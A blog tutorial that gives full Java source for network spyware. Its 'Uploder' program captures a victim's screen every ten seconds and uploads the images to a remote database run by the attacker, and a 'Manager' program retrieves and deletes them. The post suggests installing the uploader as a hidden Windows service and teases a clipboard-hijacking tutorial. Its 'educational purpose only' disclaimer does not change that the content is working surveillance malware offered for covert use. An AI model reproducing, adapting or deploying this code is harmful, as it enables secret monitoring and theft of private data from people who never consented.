Skip to main content

Creating a network spyware using java

By

According to wikipedia


Spyware is software that aims to gather information about a person or organization without their knowledge, that may send such information to another entity without the consumer's consent, or that asserts control over a device without the consumer's knowledge.
Spyware is basically used to transmit data from host's computer  to the hacker without their prior knowledge.


[Before Starting and going any deep in to the  topic i want to make it very clear that all the programs and coding describe below are for educational purpose only.If it causes any damage to the person who is using it or to the person on whom it is used author or the website takes no responsibility ]

Before Starting 


This tutorial will tell you everything which you will need to make a fully packed spy ware for yourself.
It will provide you with all the program codes and links to the required software's.

What all you need


Before starting here is a checklist of  tools and software you will be needed to make this spyware.

1)Java Development Kit(JDK)
2)MySQl connector for java.:- In order to use sql database in java program.
    NOTE :- you need not to have a MySQL database.If you have it then also it will never be needed.
3)Any java IDE.

Here i am assuming that you have install and configure everything listed above if you have found in any problem in doing so then you could google it.


Spyware's working


Our spyware is simple and could be made easily with less coding.It regularly takes screen capture after a specific interval (may be 5 sec to 10 min per screen shot depending upon database size)  of the client (where you have deploy the virus) and stores it on an online database which is administered by you.
There are two different programs which will work on two different platforms.
1) Our main virus program(Uploader.java) which will capture regular screen shot and upload it to database will run on the  client machine.
2) Our manager program(Manager.java) will run on our machine and it will regularly download the screenshot from database and cleans the database for new screenshots to be uploaded.


Need of an online free SQL database


I am sure that from our spyware working you could have guess out that this virus need a online database to function.Although there are many in the list you have to select a better and faster one with remote connections  available(most important) .
You could google it to find one for you or check this list for top hosting sites.But still i think you should use
Free SQL Database, however it provides only 5 MB of space but it is fast and reliable.

Once you have created you account you can create a database and an email will be send to you with the following details :-

Database Host            : -<Your database host>
Database  Username   :-<Your database username>
Database Password    :-<Your database password>

Just copy it somewhere as you will need it very often.


Designing Our Database 

Our database is very simple and contains only 1 table with 2 column (id ) and (imagedata) where id stores image index and data stores image itself.

Below in your account page there is a link for phpmyadmin click there a login form will be shown as below.



Where ,
                   server is Database Host
                   username is Database Username
                   and Password is Database password which you got from the Hosting site

Once you have successfully login  then on the menu tab ,select your database and then you will find (SQL) menu just click on it and run this sql code.



CREATE TABLE  `images` (
  `id` int(10) unsigned NOT NULL auto_increment,
 
  `image` longblob NOT NULL,
  PRIMARY KEY  (`id`)
);


This will create table images in your database with two columns id and image.

Here comes the end of database designing.

Programming client side virus,Uploder.java

This class uses the Robot class of java to capture screen shot and store it onto the database .
Here is the code for the Uploder.java file.






@author Quadgen -shashank sahu
package databaseVirus;

import java.awt.AWTException;
import java.awt.Dimension;
import java.awt.Rectangle;
import java.awt.Robot;
import java.awt.Toolkit;
import java.awt.image.BufferedImage;
import java.io.ByteArrayOutputStream;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.SQLException;

import javax.imageio.ImageIO;


class Uploder
{  
   
    public static Connection getConnection()
     {
   
        String driver = "YOUR DATBASE HOST HERE";
    String url = "jdbc:mysql://<YOUR DATBSE HOST>:3306/<DATABASE USERNAME>";
    String u = "<DATABASE USERNAME>";
    String p = "<DATABASE PASSWORD>";
    try {
        Class.forName(driver);
    
    
      } catch (ClassNotFoundException e) {
        
        getConnection();
    }
    Connection conn = null;
    try {
        conn = DriverManager.getConnection(url, u, p);
      } 
    catch (SQLException e) {
    getConnection();
        
    }
    return conn;
  }
    static Connection conn;
    public static void main(String args[])throws Exception
    { 
                  conn = getConnection();
                  int fre=10000;//10 seconds, defines screen shot per 10 seconds
                while(true)
                   {
                       try{
                           
                        
                           
                           BufferedImage originalImage=getImage();
                          ByteArrayOutputStream    baos = new ByteArrayOutputStream();
                          ImageIO.write(originalImage, "jpg", baos);
                            byte[] imageInByte = baos.toByteArray();
                            String insertImageSql = "INSERT INTO "
                                         + "images(image)"
                                          + " VALUES(?)";
                                     PreparedStatement  preparedStatement = conn.prepareStatement(insertImageSql);
                                                preparedStatement.setBytes(1, imageInByte);
                                         preparedStatement.executeUpdate();
                                    
                                         Thread.sleep(fre);    
                                    
                           }
                                     
                        
                                     
                          catch(Exception e)
                             {
                                         continue;
                                     }
                                         
                                     
                                     
                   }
            
               
              
            }
       public static BufferedImage getImage() throws AWTException
       {
            Dimension screenDim = Toolkit.getDefaultToolkit().getScreenSize();
              Robot robot = null;
            
                robot = new Robot();
            


               BufferedImage image = robot.createScreenCapture(new Rectangle(0, 0, (int) screenDim.getWidth(),(int) screenDim.getHeight()));
               return image;

        
       
    }
        
        
  }
dfdfd

NOTE   

You have to enter your own Database USERNAME and PASSWORD as and when required.
 Also you could change the fre(frequency ) variable as per you requirement don't set it too low                         otherwise you will end your 5 MB space in a minute or two.(Remember 1sec=1000 milli seconds)
The above program is designed in a way if some error occur which might be no internet connection or library load failure or could not capture image or database space is full then it will automatically handel it and by entering into a infinite loop until the exception ends.(E.g. Internet Connection regained).


Programming manager program (Manager.java) 


This program will be executed by the hacker it will clean the database after successfully  downloading and storing  all the  screen shot uploaded by the client.

Manager.java




import java.io.FileOutputStream;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;





public class Manager
{
   static int start,end;
    
    public static Connection getConnection()  
     {
        String driver = "YOUR DATBASE HOST HERE";
        String url = "jdbc:mysql://<YOUR DATBSE HOST>:3306/<DATABASE USERNAME>";
        String u = "<DATABASE USERNAME>";
        String p = "<DATABASE PASSWORD>";
        try {
            Class.forName(driver);
        
        
          } catch (ClassNotFoundException e) {
            
            getConnection();
        }
        Connection conn = null;
        try {
            conn = DriverManager.getConnection(url, u, p);
          } 
        catch (SQLException e) {
        getConnection();
            
        }
        return conn;
  }
    static Connection conn;
public static void main()throws Exception
{
conn=getConnection();
Statement stmt = conn.createStatement();
ResultSet rs = stmt.executeQuery("SELECT * FROM images");
int id = 0;
 start=0;
    end=0;
if (rs.next() == false) {
        System.out.println("No image is found in database ");
      
    } 
    else {
start=rs.getInt(1);
        do {
          id = rs.getInt(1);
        byte[] image  = rs.getBytes(2);
        FileOutputStream fileOutputStream = new FileOutputStream("D:/"+id+".png");
    fileOutputStream.write(image);
System.out.println("\nImage successully retrieved from database. Id of image:"+ id );
        fileOutputStream.close();
        } while (rs.next());
      }
       end=id;
      String sql = "DELETE FROM images " +
                   "WHERE id<="+id+"";
         stmt.executeUpdate(sql);           
                System.out.print("deleted record "+start+" to "+id);    
System.out.print((id-start+1)+"files Downloaded");
                stmt.close();
rs.close();
conn.close();

}




}


Packaging and deploying

You could now easily convert your Uploder.java  program into a window service by the tools which are available on net.A window service could run on the host when the computer start and stops when the computer stops.It also runs on the background so there is no need for user interference.
Look here if you want to know how to do that.

Hope this help you if yes then tell more of your friends about it.Enjoy.
Happy Programming.
Also you could leave comment if you need any help from me.
Labels:

Comments

Post a Comment

Popular posts from this blog

How to setup a .jar file in Blue-J

By
How to set a new package in Blue-J In this tutorial you will learn how you can setup a jar file in Blue J IDE. Follow the given steps and you could easily set it up. Let me specify that in my case we will install a jar file created my me that is utility.jar .If you are downloading other packages like Free TTS,open cv, j3d or any other then you just need to find the jar files in their folder and rest of the tutorial remain the same. Step 1:- Open blue-J Ide Open your blue j ide in my case it is Blue-J 3.1.7. Step 2:- In the top menu bar click on TOOLS and after that in the drop down menu click on PREFERENCES . Step 3 :- After clicking on preferences you will see a screen like this.      Just click on Libraries Tab.   Step 4 :- After clicking on libraries blue j will show the list of pre loaded jar files that you must be using before.On the right hand side of the window you will see ADD button just click on it. Step 5:- ...
Post a Comment
Read more

How to setup a .jar file in Eclipse IDE

By
How to set a new package in Eclipse IDE In this tutorial you will learn how you can setup a jar file in Eclipse IDE. Follow the given steps and you could easily set it up. Let me specify that in my case we will install a jar file created my me that is utility.jar .If you are downloading other packages like Free TTS,open cv, j3d or any other then you just need to find the jar files in their folder and rest of the tutorial remain the same. Step 1:- Open Eclipse Ide Open your Eclipse ide in my case it is  Version: Luna Service Release 2 (4.4.2) Step 2:- In the top menu bar click on  WINDOW  menu item. And then you will see a pop up menu will appear.In the pop up menu click on  PREFERENCES  . Step 3:- Then in the next window's left hand side click on JAVA and then on  BUILD PATH   .Under build path you will see two options   classpath variables   and  User Libraries   you need to click on user...
Post a Comment
Read more

Hijack Clipboard using java

By
What is Clipboard? The clipboard is a special location in your computer's memory that temporarily stores data that has been cut or copied from a document. This data can then be pasted to a new location. The clipboard will typically hold its information until you cut or copy something else, or log out of the computer. For example, a user may copy information from a word processor and paste that information into an e-mail message. What is Clipboard Hijack? A clipboard hijacking is an exploit in which the attacker gains control of the victim'sclipboard and replaces its contents with their own data, such as a link to a malicious Web site.For more details see  here . Hacking clipboard using java. Our java code will repeatedly change clipboard text with the hackers text, may be a irritating line ,or a URL to your site. We will use the Toolkit class to get the system clipboard and then we will use the Clipboard class to change the content of clipboard. ...
Post a Comment
Read more